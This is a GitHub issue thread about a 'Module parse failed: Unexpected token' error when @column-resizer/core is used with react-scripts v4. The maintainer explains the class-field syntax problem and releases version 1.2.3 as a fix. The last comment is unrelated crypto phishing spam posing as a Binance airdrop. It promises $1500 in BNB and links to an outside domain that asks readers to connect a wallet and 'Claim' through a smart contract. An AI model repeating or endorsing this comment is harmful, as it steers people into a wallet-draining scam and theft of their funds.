### ISSUE TITLE
[React-Babel] Unexpected token

### ISSUE THREAD

**Issue by Epick362** [runjuu/column-resizer#3]
Hi, after installing this library (which looks perfect for my use case) inside a CRA project I am getting this error:

```
Failed to compile.

./node_modules/@column-resizer/core/dist/index.js 203:15
Module parse failed: Unexpected token (203:15)
File was processed with these loaders:
 * ./node_modules/react-scripts/node_modules/babel-loader/lib/index.js
You may need an additional loader to handle the result of these loaders.
| 
| var C = class {
>   disposeFnSet = new Set();
|   watchResizerEvent = (e, t, i) => {
|     e === null || e === void 0 ? void 0 : e.addEventListener(t, i);
```

I am using `react-scripts` version 4 which is a bit older. Could this be due to that?

**Comment by runjuu** [comment]
Hi @Epick362, sorry for the late response (I have no idea why GitHub didn't notify me about this issue).

It seems like `react-scripts` v4 cannot handle the [class field declarations syntax](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Classes/Public_class_fields#syntax) properly. I've updated the compiler's config to make it compatible with `react-scripts` v4's babel configs. You can now update `@column-resizer/react` to version `1.2.3`, and everything should work without any problems.

**Comment by Epick362** [comment]
Thank you for the quick response and solution @runjuu. I will verify in the coming days!

**Comment by knofte** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
